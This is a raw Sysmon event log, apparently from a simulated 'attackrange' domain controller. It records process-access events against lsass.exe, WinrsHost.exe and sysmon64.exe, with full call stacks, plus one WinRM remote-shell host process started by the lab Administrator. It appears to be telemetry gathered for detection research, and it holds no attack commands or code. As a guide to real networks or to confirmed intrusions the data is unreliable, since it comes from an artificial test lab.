13:52:27.290{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-1400-000000009001}13281444C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.274{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.274{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-D902-000000009001}4520C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.268{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.259{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 